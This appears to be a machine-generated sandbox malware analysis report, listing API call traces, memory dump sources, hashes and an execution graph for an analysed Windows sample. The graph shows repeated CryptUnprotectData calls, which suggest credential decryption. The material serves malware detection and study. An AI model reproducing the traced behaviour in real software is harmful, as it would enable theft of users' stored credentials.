                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 3449924974-3080008178
                                                                                                                          • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                          • Instruction ID: fd95e7d74cf6809d4f8eb1fd1b0c41c525f08b7aa6685e2bd119da418b5cf1ce
                                                                                                                          • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                          • Instruction Fuzzy Hash: 61011A72D00219DADF009FA0CD447EFBBB4EF14305F00803AD944B6280DB789658CFA9
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                                          • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                                                                          • Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                                          • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                          • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                                                                          • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                          • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-2145255484
                                                                                                                          • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                          • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                                                                          • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                          • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2102729457-0
                                                                                                                          • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                          • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                                                                          • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                          • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                                                            • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                          • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                                                                          • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                          • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403900
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 1100898210-2145255484
                                                                                                                          • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                                                          • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                                                                          • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                                                          • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                                                                          • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 2709904686-3080008178
                                                                                                                          • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                          • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                                                                          • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                          • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                          • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                          • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:8.1%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:16.4%
                                                                                                                          Total number of Nodes:183
                                                                                                                          Total number of Limit Nodes:18
                                                                                                                          execution_graph 64489 21c26a12 64490 21c26a6a CallWindowProcW 64489->64490 64491 21c26a19 64489->64491 64490->64491 64492 21b39940 DuplicateHandle 64493 21b399d6 64492->64493 64494 21b3c48b 64497 21b3c58f 64494->64497 64498 21b3c5a0 64497->64498 64500 21b3c5c8 64498->64500 64501 21b3a798 64498->64501 64500->64500 64502 21b3a7a3 64501->64502 64505 21c21f34 64502->64505 64506 21b3c671 64505->64506 64507 21c21f4d 64505->64507 64506->64500 64510 21c2323d 64507->64510 64511 21c23248 64510->64511 64512 21c232ea 64511->64512 64515 21c24240 64511->64515 64518 21c24230 64511->64518 64522 21c21844 64515->64522 64519 21c24240 64518->64519 64520 21c21844 CreateWindowExW 64519->64520 64521 21c24275 64520->64521 64521->64512 64523 21c24290 CreateWindowExW 64522->64523 64525 21c243b4 64523->64525 64525->64525 64526 21c28f18 OleInitialize 64527 21c28f7c 64526->64527 64297 21b396f8 64298 21b3973e GetCurrentProcess 64297->64298 64300 21b39790 GetCurrentThread 64298->64300 64301 21b39789 64298->64301 64302 21b397c6 64300->64302 64303 21b397cd GetCurrentProcess 64300->64303 64301->64300 64302->64303 64304 21b39803 64303->64304 64305 21b3982b GetCurrentThreadId 64304->64305 64306 21b3985c 64305->64306 64307 15e018 64308 15e024 64307->64308 64348 21092968 64308->64348 64352 2109295a 64308->64352 64309 15e0c3 64356 2109cca0 64309->64356 64310 15e0ca 64360 21917b77 64310->64360 64366 21917b69 64310->64366 64372 21917b78 64310->64372 64311 15e1d4 64378 21985fd8 64311->64378 64384 21985fc7 64311->64384 64312 15e2e5 64390 21986668 64312->64390 64394 21986678 64312->64394 64313 15e2ec 64398 219b1ce0 64313->64398 64402 219b1cf0 64313->64402 64314 15e3f6 64406 219b21b8 64314->64406 64410 219b21a7 64314->64410 64315 15e3fd 64414 219b81e8 64315->64414 64418 219b81ea 64315->64418 64316 15e507 64422 219b8470 64316->64422 64426 219b8461 64316->64426 64317 15e50e 64430 219bfb22 64317->64430 64434 219bfb30 64317->64434 64318 15e618 64438 2109fc5a 64318->64438 64442 2109fc68 64318->64442 64319 15e61f 64446 219a73e0 64319->64446 64450 219a73d0 64319->64450 64320 15e730 64454 219ad410 64320->64454 64458 219ad401 64320->64458 64321 15e83a 64349 2109298a 64348->64349 64350 21092a56 64349->64350 64462 21099548 64349->64462 64350->64309 64353 2109298a 64352->64353 64354 21092a56 64353->64354 64355 21099548 LdrInitializeThunk 64353->64355 64354->64309 64355->64354 64357 2109ccc2 64356->64357 64358 21099548 LdrInitializeThunk 64357->64358 64359 2109cd8c 64357->64359 64358->64359 64359->64310 64361 21917b9a 64360->64361 64362 21918029 64361->64362 64364 21099548 LdrInitializeThunk 64361->64364 64362->64311 64363 21917cac 64363->64362 64466 21918431 64363->64466 64364->64363 64367 21917b70 64366->64367 64368 21918029 64367->64368 64370 21099548 LdrInitializeThunk 64367->64370 64368->64311 64369 21917cac 64369->64368 64371 21918431 2 API calls 64369->64371 64370->64369 64371->64369 64375 21917b9a 64372->64375 64373 21918029 64373->64311 64374 21917cac 64374->64373 64377 21918431 2 API calls 64374->64377 64375->64373 64376 21099548 LdrInitializeThunk 64375->64376 64376->64374 64377->64374 64380 21985ffa 64378->64380 64379 219864c9 64379->64312 64380->64379 64382 21099548 LdrInitializeThunk 64380->64382 64381 21986114 64381->64379 64383 21918431 2 API calls 64381->64383 64382->64381 64383->64381 64385 21985ffa 64384->64385 64386 219864c9 64385->64386 64388 21099548 LdrInitializeThunk 64385->64388 64386->64312 64387 21986114 64387->64386 64389 21918431 2 API calls 64387->64389 64388->64387 64389->64387 64391 2198669a 64390->64391 64392 2198676d 64391->64392 64393 21099548 LdrInitializeThunk 64391->64393 64392->64313 64393->64392 64395 2198669a 64394->64395 64396 2198676d 64395->64396 64397 21099548 LdrInitializeThunk 64395->64397 64396->64313 64397->64396 64399 219b1d12 64398->64399 64400 219b1de5 64399->64400 64401 21099548 LdrInitializeThunk 64399->64401 64400->64314 64401->64400 64403 219b1d12 64402->64403 64404 219b1de5 64403->64404 64405 21099548 LdrInitializeThunk 64403->64405 64404->64314 64405->64404 64407 219b21d4 64406->64407 64408 219b227f 64407->64408 64409 21099548 LdrInitializeThunk 64407->64409 64408->64315 64409->64408 64411 219b21d4 64410->64411 64412 219b227f 64411->64412 64413 21099548 LdrInitializeThunk 64411->64413 64412->64315 64413->64412 64415 219b8204 64414->64415 64416 219b82af 64415->64416 64417 21099548 LdrInitializeThunk 64415->64417 64416->64316 64417->64416 64419 219b8204 64418->64419 64420 219b82af 64419->64420 64421 21099548 LdrInitializeThunk 64419->64421 64420->64316 64421->64420 64423 219b8492 64422->64423 64424 219b8542 64423->64424 64425 21099548 LdrInitializeThunk 64423->64425 64424->64317 64425->64424 64427 219b8492 64426->64427 64428 219b8542 64427->64428 64429 21099548 LdrInitializeThunk 64427->64429 64428->64317 64429->64428 64431 219bfb52 64430->64431 64432 219bfc02 64431->64432 64433 21099548 LdrInitializeThunk 64431->64433 64432->64318 64433->64432 64435 219bfb52 64434->64435 64436 219bfc02 64435->64436 64437 21099548 LdrInitializeThunk 64435->64437 64436->64318 64437->64436 64439 2109fc8a 64438->64439 64440 21099548 LdrInitializeThunk 64439->64440 64441 2109fd3a 64439->64441 64440->64441 64441->64319 64443 2109fc8a 64442->64443 64444 21099548 LdrInitializeThunk 64443->64444 64445 2109fd3a 64443->64445 64444->64445 64445->64319 64447 219a73fc 64446->64447 64448 219a74a7 64447->64448 64449 21099548 LdrInitializeThunk 64447->64449 64448->64320 64449->64448 64451 219a73fc 64450->64451 64452 219a74a7 64451->64452 64453 21099548 LdrInitializeThunk 64451->64453 64452->64320 64453->64452 64455 219ad42c 64454->64455 64456 219ad4d7 64455->64456 64457 21099548 LdrInitializeThunk 64455->64457 64456->64321 64457->64456 64459 219ad42c 64458->64459 64460 219ad4d7 64459->64460 64461 21099548 LdrInitializeThunk 64459->64461 64460->64321 64461->64460 64463 21099579 64462->64463 64464 210996d9 64463->64464 64465 21099a69 LdrInitializeThunk 64463->64465 64464->64350 64465->64464 64467 21918440 64466->64467 64470 21918a97 64467->64470 64471 21918ab3 64470->64471 64477 21918ca7 64471->64477 64481 21918cb8 64471->64481 64472 21918b41 64474 21918c21 64472->64474 64485 2191861c LdrInitializeThunk 64472->64485 64478 21918cd5 64477->64478 64486 219187a8 64478->64486 64482 21918cd5 64481->64482 64483 219187a8 CryptUnprotectData 64482->64483 64484 21918d0d 64483->64484 64484->64472 64485->64474 64487 21918ef8 CryptUnprotectData 64486->64487 64488 21918d0d 64487->64488 64488->64472
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595472438.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_150000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: T
                                                                                                                          • API String ID: 0-3187964512
                                                                                                                          • Opcode ID: 208a8b21e12400e26abde4918531182b79e5e1632a2c95b903859533c63dc981
                                                                                                                          • Instruction ID: 0c4b56fb2abe15c6cab8b6d417fb471e47c092efd709390e6d6ab0016433eb55
                                                                                                                          • Opcode Fuzzy Hash: 208a8b21e12400e26abde4918531182b79e5e1632a2c95b903859533c63dc981
